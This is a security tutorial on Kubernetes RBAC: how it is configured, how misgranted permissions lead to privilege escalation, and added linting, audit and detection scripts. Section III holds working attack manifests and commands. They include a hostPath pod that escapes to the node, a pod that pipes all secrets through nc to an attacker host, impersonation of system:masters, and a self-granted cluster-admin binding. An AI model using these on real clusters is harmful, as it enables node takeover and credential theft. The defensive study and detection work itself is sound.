K8s Privilege Escalation: RBAC Permission Abuse
Word count 1453 2025-08-27 12:33:43
Kubernetes RBAC Permission Abuse and Privilege Escalation Explained
I. Kubernetes RBAC Basics
1.1 RBAC Overview
RBAC (Role-Based Access Control) is the authorization mode commonly used in Kubernetes; authorization decisions are expressed through the rbac.authorization.k8s.io API group. Enabling RBAC requires adding the --authorization-mode=RBAC parameter to the apiserver; clusters built with kubeadm 1.6+ enable it by default.
1.2 Core RBAC Objects
- Role and ClusterRole:
  - Role: defines permission rules within a single namespace
  - ClusterRole: defines cluster-wide permission rules, not restricted to a namespace
- RoleBinding and ClusterRoleBinding:
  - RoleBinding: binds a Role to a Subject (user / group / service account); takes effect only in its own namespace
  - ClusterRoleBinding: binds a ClusterRole to a Subject; takes effect across all namespaces
II. RBAC Configuration Examples
2.1 Creating a Restricted User
- Generate user credentials (a client certificate signed by the cluster CA; the certificate's CN becomes the username and its O the group):
openssl genrsa -out hx.key 2048
openssl req -new -key hx.key -out hx.csr -subj "/CN=hx/O=huoxian"
openssl x509 -req -in hx.csr -CA /etc/kubernetes/pki/ca.crt -CAkey /etc/kubernetes/pki/ca.key -CAcreateserial -out hx.crt -days 365
- Configure a kubectl context:
kubectl config set-credentials hx --client-certificate=hx.crt --client-key=hx.key
kubectl config set-context hx-context --cluster=kubernetes --namespace=kube-system --user=hx
- Create a Role:
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: hx-role
  namespace: kube-system
rules:
- apiGroups: ["", "extensions", "apps"]
  resources: ["deployments", "replicasets", "pods"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
- Create a RoleBinding (for a User subject and for roleRef the apiGroup must be rbac.authorization.k8s.io; the apiserver rejects an empty string):
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: hx-rolebinding
  namespace: kube-system
subjects:
- kind: User
  name: hx
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: Role
  name: hx-role
  apiGroup: rbac.authorization.k8s.io
2.2 Creating a Restricted Service Account
- Create the ServiceAccount:
kubectl create sa hx-sa -n kube-system
- Create the Role and RoleBinding:
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: hx-sa-role
  namespace: kube-system
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["get", "watch", "list"]
- apiGroups: ["apps"]
  resources: ["deployments"]
  verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: hx-sa-rolebinding
  namespace: kube-system
subjects:
- kind: ServiceAccount
  name: hx-sa
  namespace: kube-system
roleRef:
  kind: Role
  name: hx-sa-role
  apiGroup: rbac.authorization.k8s.io
- Retrieve the service account token (hx-sa-token-bkrlc is the auto-generated secret name in the author's cluster; the first command finds yours):
kubectl get secret -n kube-system | grep hx-sa
kubectl get secret hx-sa-token-bkrlc -o jsonpath={.data.token} -n kube-system | base64 -d
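Before applying bindings like the two above, it helps to catch the manifest errors the apiserver would reject (roleRef.apiGroup, the subject's apiGroup, a ClusterRoleBinding pointing at a namespaced Role). The following Python script is an added example, not part of the original article: it embeds a variant of the hx-rolebinding with both apiGroup fields set to "" (a common mistake) beside the correct form, plus the hx-sa-rolebinding, as plain dicts and lints them offline. The dangling-roleRef warning is an extra check of this script, not an apiserver rule. Note also that on Kubernetes 1.24 and later a token Secret is no longer created automatically for a ServiceAccount, so the kubectl get secret step above finds nothing; kubectl create token hx-sa -n kube-system requests a short-lived token instead.

```python
"""Offline structural lint for RoleBinding/ClusterRoleBinding manifests.

Added example, not code from the original article.  Manifests are embedded as
Python dicts (what a YAML loader produces) so neither PyYAML nor a cluster is
needed.  The apiGroup/kind checks mirror the apiserver's RBAC validation; the
dangling-roleRef warning is an extra check this script adds.  BROKEN_HX_BINDING
is the article's hx-rolebinding with both apiGroup fields set to "" (a common
mistake), FIXED_HX_BINDING the form the apiserver accepts.
"""

RBAC_GROUP = "rbac.authorization.k8s.io"

# Constructed inventory of existing roles keyed by (kind, namespace, name); ClusterRoles use "".
ROLES = {
    ("Role", "kube-system", "hx-role"): {"kind": "Role"},
    ("Role", "kube-system", "hx-sa-role"): {"kind": "Role"},
}


def validate_binding(binding, roles):
    """Return the problems the apiserver (or this lint, prefixed 'warning:') would raise."""
    problems = []
    kind = binding.get("kind")
    ns = binding.get("metadata", {}).get("namespace", "")
    ref = binding.get("roleRef", {})

    # roleRef.apiGroup must be the RBAC group; an empty string is rejected as unsupported.
    if ref.get("apiGroup") != RBAC_GROUP:
        problems.append(f'roleRef.apiGroup must be "{RBAC_GROUP}", got {ref.get("apiGroup")!r}')
    if ref.get("kind") not in ("Role", "ClusterRole"):
        problems.append(f'roleRef.kind must be Role or ClusterRole, got {ref.get("kind")!r}')
    elif kind == "ClusterRoleBinding" and ref["kind"] != "ClusterRole":
        # A ClusterRoleBinding can only reference a ClusterRole.
        problems.append("ClusterRoleBinding.roleRef.kind must be ClusterRole")
    else:
        # Extra lint: a Role is looked up in the binding's own namespace, a ClusterRole cluster-wide.
        ref_ns = ns if ref["kind"] == "Role" else ""
        if (ref["kind"], ref_ns, ref.get("name")) not in roles:
            problems.append(f'warning: roleRef {ref["kind"]} {ref.get("name")!r} not found in {ref_ns or "cluster"}')

    for i, subj in enumerate(binding.get("subjects", [])):
        skind = subj.get("kind")
        if skind in ("User", "Group"):
            # User and Group subjects must carry the RBAC apiGroup.
            if subj.get("apiGroup") != RBAC_GROUP:
                problems.append(f'subjects[{i}].apiGroup must be "{RBAC_GROUP}" for kind {skind}')
        elif skind == "ServiceAccount":
            # ServiceAccount subjects live in the core group: apiGroup must be empty or omitted.
            if subj.get("apiGroup", ""):
                problems.append(f"subjects[{i}].apiGroup must be empty for ServiceAccount")
            # A RoleBinding defaults a missing SA namespace to its own; a ClusterRoleBinding cannot.
            if kind == "ClusterRoleBinding" and not subj.get("namespace"):
                problems.append(f"subjects[{i}].namespace is required for ServiceAccount")
        else:
            problems.append(f"subjects[{i}].kind {skind!r} is not User, Group or ServiceAccount")
    return problems


def _binding(kind, name, ns, subjects, ref_kind, ref_name, ref_group=RBAC_GROUP):
    """Small constructor keeping the sample manifests below readable."""
    meta = {"name": name, **({"namespace": ns} if ns else {})}
    return {"apiVersion": "rbac.authorization.k8s.io/v1", "kind": kind, "metadata": meta,
            "subjects": subjects, "roleRef": {"kind": ref_kind, "name": ref_name, "apiGroup": ref_group}}


BROKEN_HX_BINDING = _binding("RoleBinding", "hx-rolebinding", "kube-system",
                             [{"kind": "User", "name": "hx", "apiGroup": ""}], "Role", "hx-role", ref_group="")
FIXED_HX_BINDING = _binding("RoleBinding", "hx-rolebinding", "kube-system",
                            [{"kind": "User", "name": "hx", "apiGroup": RBAC_GROUP}], "Role", "hx-role")
SA_BINDING = _binding("RoleBinding", "hx-sa-rolebinding", "kube-system",
                      [{"kind": "ServiceAccount", "name": "hx-sa", "namespace": "kube-system"}], "Role", "hx-sa-role")
# Constructed ClusterRoleBinding that wrongly points at a namespaced Role and omits the SA namespace.
BAD_CRB = _binding("ClusterRoleBinding", "bad-crb", "",
                   [{"kind": "ServiceAccount", "name": "hx-sa"}], "Role", "hx-role")

if __name__ == "__main__":
    for b in (BROKEN_HX_BINDING, FIXED_HX_BINDING, SA_BINDING, BAD_CRB):
        print(b["metadata"]["name"], validate_binding(b, ROLES) or "OK")
```

Running the script prints two problems for the broken binding (both apiGroup fields), OK for the two correct bindings, and two problems for the bad ClusterRoleBinding.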
III. Privilege Escalation Through RBAC Permission Abuse
3.1 Permission Enumeration
- Check permissions with kubectl:
kubectl auth can-i --list
- Check API permissions with curl:
curl -k -v -H "Authorization: Bearer <TOKEN>" https://<master_ip>:<port>/api/v1
3.2 Specific Escalation Techniques
1. Abuse of the create pods permission
When a subject holds resources: ["*"] or resources: ["pods"] together with verbs: ["create"]:
- Attack method: create a Pod that mounts the node's root filesystem and escape to the Node
- Example Pod definition:
apiVersion: v1
kind: Pod
metadata:
  name: escape-pod
spec:
  containers:
  - name: escape
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "chroot /host /bin/bash"]
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /
2. Abuse of the list secrets permission
When a subject holds resources: ["*"] or resources: ["secrets"] together with verbs: ["list"]:
- Attack method: list all secrets in the cluster and look for privileged account credentials
kubectl get secrets --all-namespaces
# or
curl -k -H "Authorization: Bearer <TOKEN>" https://<master_ip>:<port>/api/v1/secrets
3. Abuse of the get secret permission
When a subject holds resources: ["*"] or resources: ["secrets"] together with verbs: ["get"]:
- Attack method: read a specific secret to obtain sensitive information
kubectl get secret <secret-name> -o yaml
# or
curl -k -H "Authorization: Bearer <TOKEN>" https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/<secret-name>
4. Abuse of the combined get/list/watch secrets permissions
With all three permissions, a malicious Pod can be created to exfiltrate secrets:
apiVersion: v1
kind: Pod
metadata:
  name: steal-secrets
spec:
  serviceAccountName: privileged-sa
  automountServiceAccountToken: true
  containers:
  - name: stealer
    image: alpine
    command: ["/bin/sh"]
    args: ["-c", "apk add curl --no-cache; curl -k -H \"Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\" https://<master_ip>:<port>/api/v1/secrets | nc <attacker_ip> <port>"]
5. Abuse of the impersonate permission
With the impersonate permission, a high-privilege user can be impersonated:
- With kubectl:
kubectl --as system:admin --as-group system:masters get pods --all-namespaces
- With curl:
curl -k -v -XGET -H "Authorization: Bearer <TOKEN>" \
  -H "Impersonate-Group: system:masters" \
  -H "Impersonate-User: null" \
  -H "Accept: application/json" \
  https://<master_ip>:<port>/api/v1/namespaces/kube-system/secrets/
6. Abuse of other resource-creation permissions
With permission to create Deployments, DaemonSets, StatefulSets or similar workloads:
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: malicious-ds
spec:
  selector:
    matchLabels:
      name: malicious
  template:
    metadata:
      labels:
        name: malicious
    spec:
      containers:
      - name: malicious
        image: alpine
        command: ["/bin/sh"]
        args: ["-c", "malicious-command"]
7. Abuse of the bind permission
With the bind permission, a high-privilege role can be bound to the current account:
- Create a malicious RoleBinding:
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: escalate-binding
subjects:
- kind: ServiceAccount
  name: current-sa
  namespace: current-ns
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
- Apply the RoleBinding:
curl -k -v -X POST -H "Authorization: Bearer <TOKEN>" \
  -H "Content-Type: application/json" \
  https://<master_ip>:<port>/apis/rbac.authorization.k8s.io/v1/namespaces/default/rolebindings \
  -d @malicious-RoleBinding.json
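The enumeration in 3.1 and the seven primitives in 3.2 boil down to a small set of (apiGroup, resource, verb) combinations, which makes them easy to audit across a whole cluster rather than one token at a time. The Python script below is an added example, not code from the original article: it takes Role, ClusterRole, RoleBinding and ClusterRoleBinding objects in the shape of the items returned by kubectl get ... -o json, resolves which subject holds which rules (honouring * wildcards and the namespace defaulting of ServiceAccount subjects in a RoleBinding), and reports every subject that holds one of the dangerous combinations. The SAMPLE inventory is constructed: the article's hx-role, a secrets-reading ClusterRole bound cluster-wide, and a harmless pod viewer that should produce no findings.

```python
"""Cluster-wide audit for the RBAC escalation primitives described in section III.

Added example, not code from the original article.  Input objects have the
shape of the `items` returned by
`kubectl get roles,clusterroles,rolebindings,clusterrolebindings -A -o json`;
SAMPLE below is constructed so the script runs offline.  Subjects are keyed as
"ServiceAccount:<namespace>:<name>", "User:<name>" or "Group:<name>".
"""

RBAC_GROUP = "rbac.authorization.k8s.io"

# (label, apiGroups, resources, verbs): a rule matching one entry from each set trips the check.
# "*" is listed in every set so wildcard rules are caught too.
CHECKS = [
    ("create pods (hostPath escape to the node)", {"", "*"}, {"pods", "*"}, {"create", "*"}),
    ("list secrets (harvest credentials)", {"", "*"}, {"secrets", "*"}, {"list", "*"}),
    ("get secrets (read a named secret)", {"", "*"}, {"secrets", "*"}, {"get", "*"}),
    ("impersonate users/groups", {"", "*"}, {"users", "groups", "serviceaccounts", "*"}, {"impersonate", "*"}),
    ("create workloads (Deployment/DaemonSet/StatefulSet)", {"apps", "*"},
     {"deployments", "daemonsets", "statefulsets", "*"}, {"create", "*"}),
    ("bind/escalate roles (self-grant cluster-admin)", {RBAC_GROUP, "*"},
     {"roles", "clusterroles", "*"}, {"bind", "escalate", "*"}),
]


def rule_grants(rule, groups, resources, verbs):
    """True if one PolicyRule grants some verb in `verbs` on some resource in `resources` in `groups`."""
    return (bool(set(rule.get("apiGroups", [])) & groups)
            and bool(set(rule.get("resources", [])) & resources)
            and bool(set(rule.get("verbs", [])) & verbs))


def subject_key(subj):
    if subj["kind"] == "ServiceAccount":
        return f"ServiceAccount:{subj.get('namespace', '')}:{subj['name']}"
    return f"{subj['kind']}:{subj['name']}"


def effective_rules(objects):
    """Map subject key -> [(scope, rule), ...] by resolving every binding's roleRef."""
    roles = {}
    for obj in objects:
        if obj["kind"] in ("Role", "ClusterRole"):
            ns = obj["metadata"].get("namespace", "") if obj["kind"] == "Role" else ""
            roles[(obj["kind"], ns, obj["metadata"]["name"])] = obj.get("rules", [])
    granted = {}
    for obj in objects:
        if obj["kind"] not in ("RoleBinding", "ClusterRoleBinding"):
            continue
        ns = obj["metadata"].get("namespace", "")
        ref = obj["roleRef"]
        # A RoleBinding to a Role resolves in its own namespace; ClusterRoles are unnamespaced.
        rules = roles.get((ref["kind"], ns if ref["kind"] == "Role" else "", ref["name"]), [])
        scope = "cluster" if obj["kind"] == "ClusterRoleBinding" else f"namespace {ns}"
        for subj in obj.get("subjects", []):
            if subj["kind"] == "ServiceAccount" and not subj.get("namespace"):
                subj = dict(subj, namespace=ns)  # a RoleBinding defaults the SA namespace to its own
            granted.setdefault(subject_key(subj), []).extend((scope, r) for r in rules)
    return granted


def audit(objects):
    """Return {subject: [finding, ...]} for every subject holding at least one risky primitive."""
    findings = {}
    for subject, rules in effective_rules(objects).items():
        hits = []
        for label, groups, resources, verbs in CHECKS:
            scopes = sorted({scope for scope, r in rules if rule_grants(r, groups, resources, verbs)})
            if scopes:
                hits.append(f"{label} [{', '.join(scopes)}]")
        if hits:
            findings[subject] = hits
    return findings


def _role(kind, name, ns, rules):
    meta = {"name": name, **({"namespace": ns} if kind == "Role" else {})}
    return {"kind": kind, "metadata": meta, "rules": rules}


def _binding(kind, name, ns, subjects, ref_kind, ref_name):
    meta = {"name": name, **({"namespace": ns} if kind == "RoleBinding" else {})}
    return {"kind": kind, "metadata": meta, "subjects": subjects,
            "roleRef": {"kind": ref_kind, "name": ref_name, "apiGroup": RBAC_GROUP}}


# Constructed inventory: the article's hx-role, a secrets reader bound cluster-wide, a harmless pod viewer.
SAMPLE = [
    _role("Role", "hx-role", "kube-system", [{"apiGroups": ["", "extensions", "apps"],
          "resources": ["deployments", "replicasets", "pods"],
          "verbs": ["get", "list", "watch", "create", "update", "patch", "delete"]}]),
    _binding("RoleBinding", "hx-rolebinding", "kube-system",
             [{"kind": "User", "name": "hx", "apiGroup": RBAC_GROUP}], "Role", "hx-role"),
    _role("ClusterRole", "secret-reader", "", [{"apiGroups": [""], "resources": ["secrets"],
          "verbs": ["get", "list", "watch"]}]),
    _binding("ClusterRoleBinding", "secret-reader-crb", "",
             [{"kind": "ServiceAccount", "name": "backup", "namespace": "ops"}], "ClusterRole", "secret-reader"),
    _role("Role", "pod-viewer", "dev", [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list"]}]),
    _binding("RoleBinding", "pod-viewer-rb", "dev", [{"kind": "ServiceAccount", "name": "viewer"}], "Role", "pod-viewer"),
]

if __name__ == "__main__":
    for subject, hits in audit(SAMPLE).items():
        print(subject)
        for h in hits:
            print("  -", h)
```

Against a real cluster, replace SAMPLE with the concatenated items arrays from the kubectl command in the docstring. Rules contributed through aggregated ClusterRoles are only seen if the aggregated object itself is included in the input, and the scope label tells you whether a hit is namespace-local (the hx user can create pods only in kube-system) or cluster-wide (the backup service account can read every secret).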
IV. Defensive Measures
- Follow the principle of least privilege
- Audit RBAC configuration regularly
- Restrict ServiceAccount permissions
- Use PodSecurityPolicy to restrict Pod creation
- Monitor anomalous API requests
- Disable unnecessary API groups
- Use admission controllers to restrict RoleBinding creation
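The "monitor anomalous API requests" item becomes concrete once the apiserver audit log is enabled, because every technique in section III leaves a distinctive event. The Python detector below is an added example, not from the original article. It reads audit.k8s.io/v1 Event JSON lines (SAMPLE_LINES are constructed here) and flags impersonation into system:masters, a binding whose roleRef is cluster-admin, a Pod that mounts hostPath /, and a cluster-wide secrets list by a user outside a constructed control-plane allowlist. Rules 2 and 3 read requestObject, so the audit policy must record pods and RBAC bindings at level Request or RequestResponse. Note that PodSecurityPolicy from the list above was removed in Kubernetes 1.25; Pod Security Admission is the in-tree replacement for blocking hostPath Pods at admission time, and audit-log detection complements rather than replaces it.

```python
"""Detection logic over Kubernetes apiserver audit events for RBAC abuse.

Added example, not code from the original article.  Input is audit.k8s.io/v1
Event objects, one JSON document per line as written by --audit-log-path.
SAMPLE_LINES below are constructed for this example.
"""
import json

PRIVILEGED_GROUPS = {"system:masters"}
PRIVILEGED_ROLES = {"cluster-admin"}
# Constructed allowlist: control-plane identities that legitimately list secrets.
CONTROL_PLANE_USERS = {"system:kube-controller-manager", "system:kube-scheduler", "system:apiserver"}


def detect(ev):
    """Return a list of (severity, rule, detail) findings for one audit Event."""
    findings = []
    user = ev.get("user", {}).get("username", "?")
    ref = ev.get("objectRef") or {}
    resource, ns = ref.get("resource"), ref.get("namespace")
    req = ev.get("requestObject") or {}
    verb = ev.get("verb")

    # 1. Impersonation is always worth a look; it is critical when aimed at system:masters (technique 5).
    imp = ev.get("impersonatedUser")
    if imp:
        sev = "critical" if set(imp.get("groups", [])) & PRIVILEGED_GROUPS else "medium"
        findings.append((sev, "impersonation",
                         f"{user} acted as {imp.get('username')!r} groups={imp.get('groups', [])}"))

    # 2. A binding that hands out cluster-admin (technique 7).
    if verb in ("create", "update", "patch") and resource in ("rolebindings", "clusterrolebindings"):
        role = (req.get("roleRef") or {}).get("name")
        if role in PRIVILEGED_ROLES:
            findings.append(("critical", "privileged-binding",
                             f"{user} bound {role} via {resource}/{ref.get('name')} in {ns or 'cluster'}"))

    # 3. Pod creation mounting the node's root filesystem (technique 1).
    if verb == "create" and resource == "pods":
        for vol in (req.get("spec") or {}).get("volumes", []):
            if (vol.get("hostPath") or {}).get("path") == "/":
                findings.append(("high", "hostpath-root-pod",
                                 f"{user} created pod {ref.get('name')} in {ns} mounting hostPath /"))

    # 4. Cluster-wide secrets listing (technique 2) by anything outside the allowlist.
    if verb == "list" and resource == "secrets" and not ns and user not in CONTROL_PLANE_USERS:
        findings.append(("high", "secrets-list-all", f"{user} listed secrets across all namespaces"))
    return findings


def scan(lines):
    """Parse JSON audit lines and collect findings from all of them, in input order."""
    out = []
    for line in lines:
        if line.strip():
            out.extend(detect(json.loads(line)))
    return out


# Constructed audit events, one per technique, plus one benign control-plane event.
SAMPLE_LINES = [
    json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": "list",
                "user": {"username": "system:serviceaccount:kube-system:hx-sa"},
                "objectRef": {"resource": "secrets"}, "responseStatus": {"code": 200}}),
    json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": "get",
                "user": {"username": "hx"},
                "impersonatedUser": {"username": "null", "groups": ["system:masters"]},
                "objectRef": {"resource": "secrets", "namespace": "kube-system"}}),
    json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": "create",
                "user": {"username": "system:serviceaccount:default:current-sa"},
                "objectRef": {"resource": "rolebindings", "namespace": "default", "name": "escalate-binding"},
                "requestObject": {"roleRef": {"kind": "ClusterRole", "name": "cluster-admin"}}}),
    json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": "create",
                "user": {"username": "hx"},
                "objectRef": {"resource": "pods", "namespace": "kube-system", "name": "escape-pod"},
                "requestObject": {"spec": {"volumes": [{"name": "host-root", "hostPath": {"path": "/"}}]}}}),
    json.dumps({"kind": "Event", "apiVersion": "audit.k8s.io/v1", "verb": "list",
                "user": {"username": "system:kube-controller-manager"},
                "objectRef": {"resource": "secrets"}}),
]

if __name__ == "__main__":
    for sev, rule, detail in scan(SAMPLE_LINES):
        print(f"[{sev}] {rule}: {detail}")
```

To use it on a live log, feed the file to scan one line at a time (for example, open("/var/log/kubernetes/audit.log")) and forward findings to whatever alerting you already have; the allowlist and the privileged role and group sets are the knobs to tune per cluster.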
V. Summary
Misconfigured Kubernetes RBAC can lead to serious privilege escalation risk. An attacker may gain control of the cluster by creating malicious resources, stealing credentials, impersonating high-privilege users and similar means. Administrators should fully understand the RBAC mechanism, configure permissions sensibly, and perform security audits regularly.